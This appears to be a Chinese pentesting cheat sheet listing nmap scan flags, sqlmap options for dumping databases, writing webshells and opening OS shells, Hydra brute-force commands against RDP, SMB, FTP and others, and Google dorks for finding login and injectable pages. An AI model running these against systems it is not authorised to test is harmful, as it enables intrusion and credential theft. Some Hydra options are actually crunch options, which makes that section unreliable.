工具的使用

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ip:192.168.1.1
nmap -p 80,3389,1433 192.168.1.1 #指定端口扫描
nmap -p 1-65535 192.168.1.1 #全端口扫描
nmap -Pn 192.168.1.1 #扫描之前不需要ping命令,有些防火墙禁止ping命令,可使用Pn
nmap -sP 192.168.1.0/24 #不扫描端口,只扫描存活主机
nmap -sV 192.168.1.1 #服务版本探测
nmap -O 192.168.1.1 #探测系统类型及版本号
nmap -iL ip.txt #批量扫描ip.txt文档中的ip
nmap -sT 192.168.1.1 #TCP全连扫描
nmap -sS 192.168.1.1 #TCP半连扫描
nmap -sU 192.168.1.1 #UDP端口扫描
nmap -p 1-1000 192.168.1.1 -oN 1.txt #将扫描结果保存为1.txt
nmap -p 1-1000 192.168.1.1 -oA 1.xml #将扫描结果保存为1.xml
#漏洞检测
nmap --script 脚本 www.baidu.com #脚本:auth,vuln,dos,exploit等

Sqlmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
python sqlmap.py -u http://www.baidu.com/id=1?
-参数
-u #指定url探测,GET请求
-r #POST请求,bp抓包修改为psot请求,保存为txt文件
--level #执行测试的等级(1-5,,默认为1),数值>=2会检查cookie里面的参数,>=3会检查UA、 referer头
--risk #默认1,1-5,数值越大测试的语句越多
-v #显示测试时的信息,sqlmap发送的测试payload最好的等级就是3
-p #指定参数注入【-p id】,url的id?=几的参数
-threads #sqlmap默认线程10,为了让sqlmap跑到更快
batch-smart #智能判断测试,sqlmap自己测试,生产环境禁用,会脱库
mobile #模拟测试手机环境站点
m #批量注入
--dorce-ssl #跑https网站
--wizard #交互模式
--tamper “脚本名” #sqlmap过waf,使用多个脚本中间逗号隔开

--dbs #获取当前注入点数`据库的所有库`
--users:列出数据库所有用户
--current-user:检测数据库管理系统当前用户
--current-db:当前连接数据库名
--is-dba:判断当前的用户是否为管理
--tables -数据库名 #获取表名
--columns -T 表名 #获取字段名
-T 表名 -C 字段名 --dump #获取数据内容
–D “数据库名” -T “表名” -C “字段名” - -dump(导出结果) 获取密码
https://blog.csdn.net/qq_49848040/article/details/107794825 获取密码
https://blog.csdn.net/weixin_66945507/article/details/124455383

--file-read #从服务器读取文件到本地
--file-write “路径” --file-dest #写webshell
--os-shell #系统交互shell

九头蛇Hydra:密码爆破工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-b	指定文件输出的大小,避免字典文件过大  
-c 指定文件输出的行数,即包含密码的个数
-d 限制相同元素出现的次数
-e 定义停止字符,即到该字符串就停止生成
-f 调用库文件(/etc/share/crunch/charset.lst)
-i 改变输出格式,即aaa,aab -> aaa,baa
-l 通常与-t联合使用,表明该字符为实义字符
-m 通常与-p搭配
-o 将密码保存到指定文件
-p 指定元素以组合的方式进行
-q 读取密码文件,即读取pass.txt
-r 定义重某一字符串重新开始
-s 指定一个开始的字符,即从自己定义的密码xxxx开始
-t 指定密码输出的格式
-u 禁止打印百分比(必须为最后一个选项)
-z 压缩生成的字典文件,支持gzip,bzip2,lzma,7z

#破解rdp(windows远程登录)
hydra ip地址 rdp -l administrator -P 密码字典.txt -V
#telnet破解
hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt -t 32 -s 23 -e ns -f -V
#smb破解
hydra -l 用户名字典 -P 密码字典 IP地址 smb
#https破解
hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https
#ftp破解
hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v

Google hack语法

1
2
3
4
5
6
7
8
9
10
11
12
13
intext:#把网页中的正文内容中的某个字符作为搜索的条件
intitle: #把网页标题中的某个字符作为搜索的条件
cache: #搜索搜索引擎里关于某些内容的缓存,可能会在过期内容中发现有价值的信息
filetype/ext: #指定一个格式类型的文件作为搜索对象
inurl: #搜索包含指定字符的URL
site: #在指定的(域名)站点搜索相关内容
#搜索管理、后台、登录页面
site:baidu.com intext:管理 | 后台 | 后台管理 | 登陆
#搜索上传类地址
site:baidu.com inurl:file
site:baidu.com inurl:upload
#搜索注入页面
site:baidu.com inurl:php?id=